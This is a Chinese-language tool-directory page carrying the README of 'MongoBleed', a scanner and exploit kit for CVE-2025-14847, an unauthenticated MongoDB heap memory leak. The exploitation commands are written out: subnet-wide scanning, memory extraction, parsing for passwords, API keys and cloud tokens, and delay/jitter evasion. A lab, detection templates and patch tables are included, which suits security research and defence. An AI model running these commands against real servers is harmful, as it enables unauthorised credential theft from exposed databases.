Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
MongoBleed — CVE-2025-14847 (MongoBleed) 扫描器与利用工具。通过 zlib 解压缩实现未认证的 MongoDB 堆内存泄漏。包含检测、内存提取、凭据解析、CIDR/批量扫描、Nuclei 模板以及 CTF 实验室。 | Kitploit
工具/GitHubGitHub/sho-luv/mongobleed
漏洞扫描器内存取证网络映射漏洞利用CTF渗透测试学习与教育数据库安全实验室与实践
GitHubsho-luv/mongobleed

MongoBleed

CVE-2025-14847 (MongoBleed) 扫描器与利用工具。通过 zlib 解压缩实现未认证的 MongoDB 堆内存泄漏。包含检测、内存提取、凭据解析、CIDR/批量扫描、Nuclei 模板以及 CTF 实验室。

2137个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
查看仓库
分享

MongoBleed

CVE-2025-14847 扫描器与利用工具包

这是一个针对 MongoBleed 的安全研究工具包——一个 MongoDB zlib 解压过程中的严重未认证内存泄漏漏洞,攻击者可借此在无需认证的情况下从服务器堆内存中提取敏感数据。

╔╦╗┌─┐┌┐┌┌─┐┌─┐╔╗ ┬  ┌─┐┌─┐┌┬┐
║║║│ │││││ ┬│ │╠╩╗│  ├┤ ├┤  ││
╩ ╩└─┘┘└┘└─┘└─┘╚═╝┴─┘└─┘└─┘─┴┘
CVE-2025-14847 Scanner & Exploit

快速开始

# No external dependencies -- Python 3 standard library only
cd cli

# Detect if a target is vulnerable (default action)
python mongobleed.py -t localhost:27017

# Scan an entire subnet
python mongobleed.py -t 192.168.1.0/24

# Extract memory and parse for credentials
python mongobleed.py -t target:27017 -e --credentials

# Safe mode -- detection only, no exploitation
python mongobleed.py -t target:27017 -s

仓库结构

MongoBleed/
├── cli/                          # Command-line scanner and exploitation tool
│   ├── mongobleed.py             # Main CLI tool
│   ├── requirements.txt          # Python dependencies (stdlib only)
│   └── README.md                 # CLI documentation
├── lab/                          # Docker-based CTF lab environment
│   ├── docker-compose.yml        # Multi-container lab setup
│   ├── vulnerable/               # Vulnerable MongoDB configurations
│   ├── patched/                  # Patched MongoDB for comparison
│   ├── no-zlib/                  # Non-exploitable (zlib disabled)
│   ├── monitoring/               # Attack visualization dashboard
│   ├── warmup-heap.sh            # Populate heap with sensitive data
│   └── README.md                 # Lab setup instructions
├── nuclei/                       # Nuclei scanning templates
│   ├── CVE-2025-14847.yaml       # Active exploitation template
│   ├── CVE-2025-14847-safe.yaml  # Safe detection template
│   └── README.md                 # Nuclei template docs
├── docs/                         # Educational documentation
│   ├── README.md                 # Learning path index
│   ├── 01-fundamentals.md        # MongoDB & memory basics
│   ├── 02-vulnerability.md       # CVE-2025-14847 deep dive
│   ├── 03-exploitation.md        # Hands-on exploitation
│   ├── 04-detection.md           # Hunting and detection
│   └── 05-defense.md             # Mitigation strategies
└── README.md                     # This file

功能特性

CLI 工具

  • 版本指纹识别与压缩算法检测(zlib/snappy/zstd)
  • 漏洞检测,支持安全模式选项
  • 通过偏移量扫描提取内存(可配置范围)
  • 凭证模式检测(16 种模式:密码、API 密钥、JWT、AWS 密钥、MongoDB URI 等)
  • CIDR 表示法支持(192.168.1.0/24、10.0.0.0/16:27018)
  • 支持从目标文件批量扫描,多线程并发
  • 连续提取模式
  • 十六进制转储与可打印字符串提取
  • JSON 输出与文件导出
  • 规避控制(延迟、抖动)
  • 彩色终端输出

实验环境

  • 多个存在漏洞的 MongoDB 版本(4.4.29、6.0.26、8.0.16)
  • 用于对比的已修复版本(8.0.17)
  • 无 zlib 版本,展示缓解措施
  • 预置了真实的敏感数据
  • 用于学习的 CTF 风格标志
  • 带攻击可视化的监控仪表板
  • 堆预热脚本,用于可靠的利用演示

Nuclei 模板

  • 安全检测模板(仅版本 + 压缩检查)
  • 主动利用模板(版本 + zlib 确认)

使用方法

检测

# Check single target
python mongobleed.py -t localhost:27017

# Check with verbose output
python mongobleed.py -t localhost:27017 -v

# Safe mode -- detection only, never sends exploit payload
python mongobleed.py -t localhost:27017 -s

# Show version info
python mongobleed.py -t localhost:27017 --version

网络扫描

# Scan a /24 subnet
python mongobleed.py -t 192.168.1.0/24

# CIDR with custom port
python mongobleed.py -t 10.0.0.0/24:27018

# Scan from target file (CIDR ranges in file are expanded)
python mongobleed.py -T targets.txt -j 20 -o results.json

# Target file can contain IPs, host:port, and CIDR ranges
cat targets.txt
# 192.168.1.100:27017
# 10.0.0.0/24
# mongodb.internal:27017

内存提取

# Extract memory (default offset range 20-8192)
python mongobleed.py -t target:27017 -e

# Custom offset range
python mongobleed.py -t target:27017 -e --min-offset 20 --max-offset 500

# Continuous extraction (Ctrl+C to stop)
python mongobleed.py -t target:27017 --continuous

# Force extraction even if version check is inconclusive
python mongobleed.py -t target:27017 -e --force

分析

# Parse leaked memory for credentials and secrets
python mongobleed.py -t target:27017 -e --credentials

# Parse for tokens specifically
python mongobleed.py -t target:27017 -e --tokens

# Extract printable strings
python mongobleed.py -t target:27017 -e --strings

# Hexdump output
python mongobleed.py -t target:27017 -e --hexdump

规避控制

# Add delay between requests (milliseconds)
python mongobleed.py -t target:27017 -e --delay 500

# Random jitter on delay
python mongobleed.py -t target:27017 -e --delay 1000 --jitter

Nuclei 模板

# Safe detection only
nuclei -t nuclei/CVE-2025-14847-safe.yaml -u mongodb://localhost:27017

# Active detection
nuclei -t nuclei/CVE-2025-14847.yaml -u mongodb://localhost:27017

# Scan multiple targets
nuclei -t nuclei/ -l targets.txt

实验环境

# Start all containers
cd lab && docker compose up -d

# Services:
# - localhost:27017  MongoDB 4.4.29 (Vulnerable + zlib)
# - localhost:27018  MongoDB 6.0.26 (Vulnerable + zlib)
# - localhost:27019  MongoDB 8.0.16 (Vulnerable + zlib)
# - localhost:27020  MongoDB 8.0.17 (Patched)
# - localhost:27021  MongoDB 8.0.16 (No zlib - not exploitable)
# - localhost:8080   Monitoring Dashboard

# Warm up heap with sensitive data before exploitation
./warmup-heap.sh 27017 50

# Run exploit against lab
cd ../cli
python mongobleed.py -t localhost:27017 -e --credentials

CLI 选项

Target:
  -t, --target TARGET     Target host:port or CIDR range (e.g. 192.168.1.0/24)
  -T, --targets FILE      File with target list (supports CIDR per line)

Detection:
  --detect                Detect if target is vulnerable (default action)
  --version               Show MongoDB version
  -s, --safe              Safe mode - detection only, no exploitation

Exploitation:
  -e, --extract           Extract memory via offset scanning
  --min-offset N          Minimum offset to probe (default: 20)
  --max-offset N          Maximum offset to probe (default: 8192)
  --continuous            Continuous extraction mode
  --force                 Force extraction even if version check fails

Analysis:
  --credentials           Parse for credentials
  --tokens                Parse for tokens
  --strings               Extract printable strings
  --hexdump               Display hexdump

Evasion:
  --delay MS              Delay between requests (milliseconds)
  --jitter                Random delay jitter

Output:
  -o, --output FILE       Output file (JSON)
  -v, --verbose           Verbose output
  -q, --quiet             Quiet mode
  --json                  JSON output
  --no-color              Disable colors

Connection:
  --timeout SECS          Connection timeout (default: 10)
  -j, --threads N         Threads for batch scanning (default: 10)

凭证检测模式

该工具会在提取的内存中搜索以下模式:

类型示例模式
passwordpassword: value, passwd=value
secretsecret: value
api_keyapi_key: sk_live_...
tokentoken: ... (16+ chars)
bearer_tokenBearer eyJ...
jwteyJ... (Base64 JWT)
mongodb_urimongodb://user:pass@host
postgres_uripostgresql://...
redis_uriredis://...
stripe_keysk_live_...
openai_keysk-... (48+ chars)
aws_access_keyAKIA...
github_tokenghp_...
slack_tokenxoxb-..., xoxp-...
ctf_flagFLAG{...}

CVE-2025-14847 详情

项目值
CVECVE-2025-14847
名称MongoBleed
CWECWE-130(长度参数处理不当)
CVSS8.7(高危)
类型未认证内存泄漏
披露日期2025 年 12 月 19 日
野外利用2025 年 12 月 29 日

受影响版本

分支受影响版本已修复版本
8.2.x8.2.0 - 8.2.28.2.3
8.0.x8.0.0 - 8.0.168.0.17
7.0.x7.0.0 - 7.0.277.0.28
6.0.x6.0.0 - 6.0.266.0.27
5.0.x5.0.0 - 5.0.315.0.32
4.4.x4.4.0 - 4.4.294.4.30
4.2.x所有版本已停止支持 - 无补丁
4.0.x所有版本已停止支持 - 无补丁
3.6.x所有版本已停止支持 - 无补丁

工作原理

下载工具